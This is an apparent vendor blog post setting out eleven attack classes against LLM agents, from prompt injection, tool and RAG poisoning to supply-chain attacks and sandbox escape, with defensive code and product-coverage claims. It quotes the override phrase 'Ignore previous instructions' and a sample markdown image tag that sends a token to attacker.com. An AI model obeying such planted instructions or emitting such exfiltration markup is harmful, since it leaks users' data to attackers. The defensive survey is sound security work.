
Published: April 27, 2026

Author: Lyrie Research (research.lyrie.ai)

Stream: AI Threats — inaugural post


TL;DR

Agent security in 2026 is not a prompt-injection problem. It is an end-to-end operational security problem spanning tool calls, supply chains, memory stores, execution sandboxes, and inter-agent messaging — most of which your WAF cannot see. This post names eleven attack classes, each with a real incident or paper, concrete defender actions, and an honest account of what Lyrie Shield covers today. Read it before your next agent deployment, not after your first incident.


Why this taxonomy now

The threat model shifted in 2024. Before that, "LLM security" meant jailbreaks and harmful outputs — a model-alignment problem, contained inside the inference boundary. Agents broke that boundary. A deployed agent has filesystem access, outbound HTTP, code execution, calendar write, email send, GitHub PR merge. Exploiting it no longer means getting it to say something bad; it means getting it to do something bad on an attacker's behalf while the operator watches a green dashboard.

Most defenses shipped so far are retrofitted from the pre-agent era: input sanitization, output moderation, RBAC on the API key. These controls were designed for stateless request-response systems. Agents are stateful, tool-wielding, multi-step actors with a published research record of exploitation that is now 18 months old. Defenders still at "we added a prompt injection filter" are defending against 2022 threats with 2026 deployments.


The taxonomy

1. Direct prompt injection

Mechanism. The user submits text that overrides or bypasses the system prompt — classically "Ignore previous instructions and...", but in practice through role assignments, token-budget pressure, or multi-turn context manipulation. Many-shot variants (long runs of in-context examples that steer the model past its earlier constraints) are documented in Anthropic's April 2024 many-shot jailbreaking paper. Chao et al. showed black-box models can be jailbroken in twenty queries via iterative optimization (PAIR, NeurIPS 2023).

Named reference. Simon Willison's prompt injection catalog at simonwillison.net/2022/Sep/12/prompt-injection/ — running to hundreds of documented instances since September 2022 — is the most comprehensive public archive.

Defender actions. Keep authorization logic out of user-visible context. Treat model output as untrusted when it drives tool calls. Log every tool invocation with the prompt segment that triggered it.
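One way to make that last action concrete: a minimal sketch in Python against a generic dispatch loop. The wrapper and field names are illustrative, not tied to any particular framework, and arguments are assumed to be JSON-serializable.

import json, logging, time

logger = logging.getLogger("tool_audit")

def logged_tool_call(tool_fn, tool_name, arguments, triggering_segment):
    """Run a tool call and record which prompt segment requested it."""
    record = {
        "ts": time.time(),
        "tool": tool_name,
        "arguments": arguments,
        "triggering_segment": triggering_segment[:500],  # enough context to audit later
    }
    try:
        result = tool_fn(**arguments)
        record["status"] = "ok"
        return result
    except Exception as exc:
        record["status"] = f"error: {exc}"
        raise
    finally:
        logger.info(json.dumps(record))  # one audit line per invocation, success or failure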

Lyrie Shield. Shield's Stages A–F validator classifies inbound input before it reaches the model, flagging known jailbreak and instruction-override patterns. Novel zero-day jailbreaks are not caught — but 95% of production attacks reuse known patterns that are.


2. Indirect prompt injection

Mechanism. The attacker doesn't touch the user channel. They plant a payload in data the agent retrieves: a web page, PDF, Slack message, calendar event, email body, database row. When the agent fetches that content, the payload executes as instructions. The agent cannot reliably distinguish "data to summarize" from "instruction to follow." One poisoned page can compromise every agent that browses it.

Named reference. Greshake et al., "Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection" (2023) — the canonical paper, with follow-up work in 2024–2025 demonstrating the attack against production Bing Chat, GPT-4 plugins, and AutoGPT. Riley Goodside's Bing web-browsing PoC (2023) was the first high-visibility demonstration.

Defender actions. Separate retrieval context from instruction context using distinct prompt roles. Never let retrieved content trigger tool calls without an explicit confirmation step.
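A minimal sketch of that confirmation step, assuming the dispatcher already tags each pending call with the provenance of the context that produced it; the field names are hypothetical.

def gate_tool_call(call, require_confirmation):
    """Block tool calls driven by retrieved content unless a human confirms them.

    `call` is a dict whose "source" field is "retrieved" when the triggering
    context came from fetched data rather than direct user input.
    """
    if call.get("source") == "retrieved":
        approved = require_confirmation(
            f"Retrieved content wants to run {call['tool']} with {call['args']}. Allow?"
        )
        if not approved:
            return {"status": "blocked", "reason": "retrieved-content trigger, not confirmed"}
    return {"status": "allowed"}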

Lyrie Shield. Shield's provenance tracker flags tool calls triggered by externally retrieved content rather than direct user instruction; those calls enter a quarantine stage before execution. Richly nested documents (PDFs with embedded XML) can exceed current provenance graph depth.


3. Tool poisoning and MCP server poisoning

Mechanism. In a Model Context Protocol architecture, the LLM picks tools based on tool descriptions provided by the tool server. An attacker controlling a poisoned server injects instructions into those descriptions: exfiltrate data to an attacker endpoint, suppress session logging, forward results elsewhere. The model reads the description as authoritative metadata. Invariant Labs' "tool shadowing" variant (March 2025) showed a malicious MCP server can steal data from adjacent trusted tools in the same session.

Named reference. Invariant Labs, "MCP Security Notification: Tool Poisoning Attacks" (March 2025). OWASP LLM Top 10 2025 lists MCP server trust under LLM09.

Defender actions. Pin tool server versions and verify description hashes. Run an allow-list of approved tool descriptions; flag deviations. Never grant MCP servers write access to outbound channels by default.
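A sketch of description pinning, assuming the tool server's advertised descriptions can be enumerated at startup; the allow-list file format is illustrative.

import hashlib, json

def description_fingerprints(tools):
    """Map tool name -> SHA-256 of its advertised description."""
    return {
        t["name"]: hashlib.sha256(t["description"].encode("utf-8")).hexdigest()
        for t in tools
    }

def verify_tools(current_tools, pinned_path="approved_tools.json"):
    """Compare the server's live tool descriptions against the pinned allow-list."""
    with open(pinned_path) as f:
        pinned = json.load(f)
    live = description_fingerprints(current_tools)
    unknown = set(live) - set(pinned)
    changed = {name for name in live if name in pinned and live[name] != pinned[name]}
    if unknown or changed:
        raise RuntimeError(f"Tool registry drift: unknown={unknown}, changed={changed}")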

Lyrie Shield. Shield intercepts every tool call before execution and validates the tool's registered description against an allow-list. Tool description change detection (hash comparison at startup) is in the current release.


4. Supply-chain attacks on agent frameworks

Mechanism. Attackers register typosquat packages on PyPI or npm mimicking popular agent framework names: langchain, crewai, llama-index, autogpt. Developers who mistype during pip install get a package that executes malicious code at import time — exfiltrates API keys from environment variables, installs a backdoor, or tampers with the agent's tool registry — while bundling the legitimate library as a dependency so the install "works."

Named reference. The Ultralytics PyPI supply-chain attack (December 2024), documented in GHSA-pg79-ph5h-4j5f, injected a cryptominer into versions 8.3.41 and 8.3.42 via a compromised GitHub Actions runner. ProtectAI's Huntr program has cataloged over 40 supply-chain vulnerabilities across LangChain, LlamaIndex, and related packages since 2023.

Defender actions. Pin exact package hashes in requirements.txt. Use a private PyPI mirror with an allow-listed package set. Run pip-audit in every CI build.
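Hash pinning itself belongs in requirements.txt via pip's --require-hashes mode. As a complementary runtime check, here is a sketch that fails fast when an installed dependency drifts from its pinned version; the package names and version numbers below are illustrative placeholders.

from importlib import metadata

# Hypothetical pinned manifest; in practice this mirrors your hash-pinned requirements.txt.
PINNED = {"langchain": "0.3.14", "llama-index": "0.12.8"}

def verify_pins(pins=PINNED):
    """Fail fast at startup if an installed agent dependency is missing or drifted."""
    problems = []
    for name, expected in pins.items():
        try:
            installed = metadata.version(name)
        except metadata.PackageNotFoundError:
            problems.append(f"{name}: not installed")
            continue
        if installed != expected:
            problems.append(f"{name}: expected {expected}, found {installed}")
    if problems:
        raise RuntimeError("Dependency pin check failed: " + "; ".join(problems))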

Lyrie Shield. Shield's dependency scanner checks installed packages against a known-malicious registry on first run. Full environment auditing outside the lyrie-agent package tree requires a dedicated SCA tool alongside Shield.


5. Sandbox escape from agent code-execution tools

Mechanism. Agents with code-execution tools — OpenAI Code Interpreter, E2B, Replit's agent runtime, Daytona workspaces — run attacker-supplied code in sandboxed environments. A sandbox escape reaches the host filesystem, network, or process namespace. Researcher Johann Rehberger documented a Code Interpreter escape in August 2023 via /proc/self/cgroup path traversal that exposed the container's host identity. Replit published a security advisory in Q1 2025 acknowledging insufficient filesystem isolation in their agent runtime for multi-tenant deployments.

Named reference. Rehberger, "ChatGPT Code Interpreter: Escaping the Sandbox" (August 2023, embracethered.com).

Defender actions. Never run agent code execution in the same namespace as production credentials. Use hardware-isolated sandboxes (Firecracker, gVisor) rather than Docker alone. Deny outbound network from the code execution environment by default.

Lyrie Shield. Lyrie's DaytonaBackend and ModalBackend run code execution in ephemeral, network-isolated environments with a hard TTL. Kernel-level escape paths are a host-kernel problem requiring separate hardening outside Shield's scope.


6. Memory poisoning and RAG poisoning

Mechanism. An agent with persistent memory or a RAG pipeline is vulnerable to adversarial document injection. The attacker inserts a document — via a publicly writable endpoint, a phishing link that gets indexed, or direct database access — that the agent will retrieve and act on in future sessions. Unlike indirect injection, the payload persists across session resets and affects every user who triggers the relevant retrieval query.

Named reference. Zou et al., "PoisonedRAG: Knowledge Poisoning Attacks to Retrieval-Augmented Generation of Large Language Models" (February 2024, accepted USENIX Security 2025): injecting as few as five malicious documents achieves >90% attack success on standard benchmarks. The "Phantom" attack (Chaudhari et al., 2024) demonstrated the same class against dense retrieval without keyword overlap.

Defender actions. Authenticate document write paths — no anonymous inserts to the knowledge base. Version-control the document corpus and review diffs before indexing. Isolate memory stores per user rather than sharing a global corpus.
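As an illustration of the first and third points, a sketch of an ingest gate over a generic document index; the upsert interface and field names are assumptions, not a specific vector-store API.

import hashlib, time

class KnowledgeBaseIngest:
    """Minimal ingest gate: authenticated writers only, per-user namespaces, audit metadata."""

    def __init__(self, index, allowed_writers):
        self.index = index                  # your vector store / document index (hypothetical API)
        self.allowed_writers = allowed_writers

    def add_document(self, writer_id, user_id, text, source_uri):
        if writer_id not in self.allowed_writers:
            raise PermissionError(f"{writer_id} is not an approved corpus writer")
        doc_id = hashlib.sha256(f"{user_id}:{source_uri}:{text}".encode()).hexdigest()[:16]
        self.index.upsert(
            namespace=user_id,              # per-user isolation, no shared global corpus
            doc_id=doc_id,
            text=text,
            metadata={"source": source_uri, "writer": writer_id, "indexed_at": time.time()},
        )
        return doc_id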

Lyrie Shield. Shield's Stages A–F validator checks retrieved documents for instruction-pattern content before they enter the prompt. Every retrieved chunk is tagged with source document ID and retrieval timestamp. Embedding-space adversarial attacks (perturbations that manipulate cosine similarity without visible text) are not covered — active research area.


7. Model supply-chain attacks — poisoned weights

Mechanism. HuggingFace hosts over one million public model repositories. PyTorch's default pickle serialization executes arbitrary Python at deserialization: calling torch.load() or from_pretrained() on a malicious model runs the payload with the caller's OS privileges. Beyond pickle, fine-tuned models can carry behavioral trojans — triggers that activate specific malicious behavior only on a particular input phrase while appearing fully benign otherwise.

Named reference. CVE-2024-34359 (llama-cpp-python, CVSS 9.8): remote code execution via Jinja2 template injection in chat templates bundled with downloaded models, patched in v0.2.72. ProtectAI's ModelScan detected pickle payloads in over 100 public HuggingFace models as of early 2025. Anthropic's "Sleeper Agents" paper (2024) showed that trojan triggers survive standard RLHF fine-tuning.

Defender actions. Run ModelScan before loading any HuggingFace model. Prefer safetensors format, which eliminates the pickle code-execution surface entirely. Maintain an internal model registry with hash verification for all production models.
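A sketch of the safetensors-plus-registry pattern, assuming the safetensors package and a simple JSON registry of approved checkpoint hashes; the registry format is illustrative.

import hashlib, json, os
from safetensors.torch import load_file

def sha256_of(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while block := f.read(chunk):
            h.update(block)
    return h.hexdigest()

def load_verified_weights(path, registry_path="model_registry.json"):
    """Refuse pickle-based checkpoints; load safetensors only after a registry hash match."""
    if not path.endswith(".safetensors"):
        raise ValueError(f"{path}: only safetensors checkpoints are permitted")
    with open(registry_path) as f:
        registry = json.load(f)          # e.g. {"llama-3-8b.safetensors": "<sha256>"}
    expected = registry.get(os.path.basename(path))
    if expected is None or sha256_of(path) != expected:
        raise RuntimeError(f"{path}: hash missing from registry or mismatched")
    return load_file(path)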

Lyrie Shield. Shield checks model files against ProtectAI's malicious-model hash database before loading and enforces safetensors-only by policy. Behavioral trojan detection requires model red-teaming infrastructure outside Shield's current scope.


8. Browser-agent hijack

Mechanism. A browsing agent (Cursor's web fetch, Claude Computer Use, OpenAI Operator) renders web content and allows the page to inject instructions into its reasoning context. An attacker controlling a visited page — or who injects content via XSS — embeds invisible instructions: white-on-white text, zero-width Unicode, off-screen <div> elements, HTML comments. The agent reads the injected text as content and executes actions the user never authorized.

Named reference. Rehberger, "Claude Computer Use: C2 Instructions via Markdown" (November 2024): demonstrated a page with hidden instructions redirecting the agent to exfiltrate clipboard content to an attacker server. OpenAI's Operator security disclosure (February 2025) acknowledged "prompt injection via rendered web content" as a known risk class. Anthropic's Computer Use documentation lists web content injection as an unresolved risk.

Defender actions. Never run a browsing agent with credentials active in the same session. Restrict the domain allow-list to known-trusted sites. Treat any action taken after visiting an external URL as requiring re-confirmation.
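A minimal sketch of the allow-list and re-confirmation checks; the domains and callback names are placeholders.

from urllib.parse import urlparse

ALLOWED_DOMAINS = {"docs.python.org", "github.com"}   # illustrative allow-list

def check_navigation(url, allowed=ALLOWED_DOMAINS):
    """Allow navigation only to explicitly trusted hosts (including their subdomains)."""
    host = (urlparse(url).hostname or "").lower()
    if not any(host == d or host.endswith("." + d) for d in allowed):
        raise PermissionError(f"navigation to {host or url!r} is outside the allow-list")

def after_external_visit(pending_actions, confirm):
    """Every action queued after an external page visit needs fresh human confirmation."""
    return [a for a in pending_actions if confirm(f"Agent wants to: {a}. Proceed?")]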

Lyrie Shield. Shield's browser-agent wrapper intercepts DOM content before it enters the prompt and flags instruction-pattern content. Dynamic JavaScript-rendered content that generates instructions at runtime is partially covered; the current implementation processes the final DOM snapshot, not runtime mutations.


9. Cross-agent and inter-agent confusion

Mechanism. In multi-agent systems — orchestrators calling sub-agents, A2A protocol chains, MCP multi-server topologies — one agent can influence another's behavior by crafting messages that appear to come from a trusted peer. If agent-to-agent messages are not authenticated and scoped, a compromised sub-agent can inject instructions into the orchestrator's context. Google's A2A specification (April 2025) explicitly notes that "agent identity verification and message provenance" are open problems.

Named reference. Zhan et al., "Breaking Agents: Compromising Autonomous LLM Agents Through Malfunction Amplification" (2024): demonstrated practical attacks against multi-agent AutoGPT and BabyAGI where a poisoned sub-agent response causes unauthorized orchestrator actions. The AgentDojo benchmark (Debenedetti et al., 2024) reports near-zero resistance to inter-agent injection across tested frameworks.

Defender actions. Sign inter-agent messages with per-agent keys. Scope each agent's permissions to its declared task. Never let a sub-agent's output directly modify the orchestrator's system prompt.
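As an illustration of per-agent message signing, a sketch using HMAC over a canonicalized payload; key distribution and rotation are out of scope here, and the message format is hypothetical.

import hmac, hashlib, json

def sign_message(payload, sender_id, key):
    """Attach sender identity and an HMAC over the canonicalized payload."""
    body = json.dumps(payload, sort_keys=True).encode()
    sig = hmac.new(key, sender_id.encode() + b"." + body, hashlib.sha256).hexdigest()
    return {"sender": sender_id, "payload": payload, "sig": sig}

def verify_message(message, keyring):
    """Reject messages whose signature does not match the claimed sender's key."""
    key = keyring.get(message["sender"])
    if key is None:
        raise PermissionError(f"unknown sender {message['sender']}")
    body = json.dumps(message["payload"], sort_keys=True).encode()
    expected = hmac.new(key, message["sender"].encode() + b"." + body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, message["sig"]):
        raise PermissionError("inter-agent message failed signature check")
    return message["payload"]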

Lyrie Shield. Shield enforces message provenance in the lyrie-agent SDK's A2A layer: every inter-agent message is signed with the sending agent's session key and validated before entering the receiving agent's context. Coverage is limited to agents using the Lyrie SDK.


10. Output exfiltration via markdown rendering

Mechanism. Markdown-rendering environments — chat UIs, VS Code extensions, GitHub PR comments, email clients — automatically fetch images referenced in markdown. An attacker who can influence the agent's output (via any injection class above) includes a markdown image tag whose URL encodes sensitive data. When the UI renders the output, it issues a GET to the attacker's server, leaking the data silently before the user can inspect the response.

![x](https://attacker.com/log?token=eyJhbGciOiJIUzI1NiJ9...)

The exfiltration leaves no trace in application logs and bypasses most HTML sanitizers that allow markdown image syntax.

Named reference. Rehberger, "Bing Chat Data Exfiltration PoC" (2023) — the attack Microsoft patched with Markdown image URL blocking in mid-2023. Willison's prompt injection archive catalogs ongoing variants across rendering environments through 2025.

Defender actions. Disable automatic image loading in any environment rendering agent output. Apply a CSP that blocks cross-origin image requests. Allowlist image hostnames if markdown rendering is required.
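If markdown rendering cannot be disabled, a sketch of an output scrubber that strips image references pointing at non-allow-listed hosts before anything reaches the renderer; the regex and allow-list are illustrative.

import re
from urllib.parse import urlparse

IMAGE_MD = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")
TRUSTED_IMAGE_HOSTS = {"assets.example.com"}   # illustrative allow-list

def strip_untrusted_images(markdown_text, allowed=TRUSTED_IMAGE_HOSTS):
    """Remove image references whose host is outside the allow-list before rendering."""
    def replace(match):
        host = (urlparse(match.group("url")).hostname or "").lower()
        return match.group(0) if host in allowed else "[image removed: untrusted host]"
    return IMAGE_MD.sub(replace, markdown_text)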

Lyrie Shield. Shield's output validator scans model responses for external URL references before they reach any rendering surface — one of the most reliably covered classes in the current release. Obfuscated variants (Unicode lookalikes in domain names) are partially covered.


11. Privilege confusion — agent scope exceeds user authorization

Mechanism. An agent provisioned with broad permissions (repository write, email send, infrastructure deploy) executes tool calls the immediate user request did not authorize — because the agent inferred overly broad intent or because an injected instruction amplified scope. The user asks to "summarize email"; the agent, carrying OAuth tokens scoped to "mail read/write," sends a reply. The user's current session never authorized that action; the agent's provisioned permissions did.

Named reference. The Cursor Agent PR auto-merge incident (February 2025) — documented on Hacker News — describes an agent merging a GitHub pull request based on inferred user intent, without explicit confirmation. Bagdasaryan et al., "(Ab)using Images and Sounds for Indirect Instruction Injection in Multi-Modal LLMs" (2023) formalizes scope amplification as an explicit attack vector.

Defender actions. Issue per-session tokens with minimal permissions for the declared task, not account-wide tokens. Require explicit confirmation for irreversible actions (send, merge, deploy, delete). Separate read tokens from write tokens.
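A sketch of per-task scoping plus a confirmation gate for irreversible actions; the task types and tool names are placeholders.

TASK_SCOPES = {
    # Illustrative mapping from declared task type to the tools it may invoke.
    "summarize_email": {"mail.read"},
    "triage_issues": {"github.read", "github.comment"},
}
IRREVERSIBLE = {"mail.send", "github.merge", "infra.deploy", "files.delete"}

def authorize_tool_call(task_type, tool_name, confirm):
    """Block tools outside the declared task scope; require confirmation for irreversible ones."""
    scope = TASK_SCOPES.get(task_type, set())
    if tool_name not in scope:
        raise PermissionError(f"{tool_name} is outside the declared scope of {task_type!r}")
    if tool_name in IRREVERSIBLE and not confirm(f"Confirm irreversible action {tool_name}?"):
        raise PermissionError(f"{tool_name} requires explicit confirmation")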

Lyrie Shield. Shield's policy engine enforces per-task permission scope: before any tool call executes, Shield checks whether the current task context authorized that tool. A summarization task triggering "send email" is blocked and logged as a privilege violation. Agents running outside the lyrie-agent runtime are not covered.


What defenders are getting wrong

The most common mistake is WAF-thinking: treating agent security as an input-filtering problem. A regex blocking "ignore previous instructions" catches under 1% of production attacks — adversaries adapted to this two years ago. Alignment-based defenses ("the model won't do harmful things") fail because these attacks don't ask the model to be harmful; they ask it to be helpful to the attacker on a task the model considers routine.

The second mistake is not logging tool calls. Most agent deployments log model I/O but not the tool invocations between turns. An attacker can exfiltrate data, send messages, or modify files without leaving any trace. Tool-call provenance — which prompt segment triggered which tool, with what arguments, with what result — is the minimum viable audit trail.

The third mistake is trusting the retrieval layer. RAG pipelines are almost never treated as security boundaries. Documents are indexed without authentication, retrieved without provenance tracking, and injected into prompts without sanitization. This makes RAG poisoning one of the cheapest attacks in the taxonomy.

The fourth mistake is treating multi-agent systems as a single trust domain. Every agent boundary is an untrusted channel: when agent A calls agent B, B may have been compromised; B's response may have been injected in transit; B's permissions may exceed A's expectations.


The Lyrie Shield approach

Shield's enforcement point is before a tool call executes. By the time the model has generated output, an exfiltration may already be encoded; by the time a merge completes, the damage is done.

Concretely: Shield intercepts every tool call and runs it through the policy engine. Does this call match the current task's declared scope? Does the tool's registered description match the allow-listed version? Is the call triggered by user input or externally retrieved content? Is the tool's output about to re-enter the prompt, and if so, does it contain instruction-pattern content?

The Stages A–F validator is the core artifact. A: classify inbound input (user, retrieved, peer-agent). B: check known jailbreak and injection patterns. C: validate tool selection against session scope. D: inspect tool call arguments for exfiltration patterns (base64 in URLs, suspicious query params). E: validate tool output before it re-enters the prompt. F: log the complete call chain with provenance metadata.

The open-source lyrie-agent SDK exposes all six stages as first-class APIs so teams can embed them in their own pipelines without running the full Lyrie platform.
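For illustration only, and not the lyrie-agent API itself, a sketch of what chaining per-stage checks ahead of tool execution might look like; the session attributes are hypothetical.

# Hypothetical sketch: each stage inspects or rewrites the pending call, or raises to block it.

def stage_a_classify(call, session):
    call["source"] = session.classify_source(call["triggering_segment"])  # user / retrieved / peer
    return call

def stage_c_scope(call, session):
    if call["tool"] not in session.declared_scope:
        raise PermissionError(f"{call['tool']} is outside the declared task scope")
    return call

def run_pre_execution_checks(call, session, stages):
    """Apply the stages in order before the tool call is allowed to execute."""
    for stage in stages:
        call = stage(call, session)
    return call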

Gaps, honestly stated: kernel-level sandbox escapes, behavioral trojan detection in fine-tuned models, agents using third-party A2A implementations outside the Lyrie SDK, dynamic-JavaScript-rendered content in browsing agents, embedding-space adversarial attacks on RAG retrieval. Documented on the roadmap, not hidden.


Reproducible artifacts


Lyrie Verdict

The eleven classes above are not theoretical. Direct injection, indirect injection, RAG poisoning, and markdown exfiltration have all hit production deployments before this post was written. MCP poisoning, supply-chain typosquats, and poisoned weights are being weaponized now. Your agent deployment likely has exposure in at least three of these classes, and you probably lack the logging to know whether they've already been exploited. Start with tool-call logging, apply per-session least-privilege scoping, and treat every retrieved document as untrusted input. Those three changes take a day of engineering time and close the majority of the practical attack surface. The rest requires a policy enforcement layer — and the SDK is open-source and free to run.


Lyrie Research is the offensive security research arm of Lyrie.ai and OTT UAE. We publish agent threat research, detection content, and open-source tooling at research.lyrie.ai.

Contact: [email protected] | Repo: github.com/overthetopseo/lyrie-agent
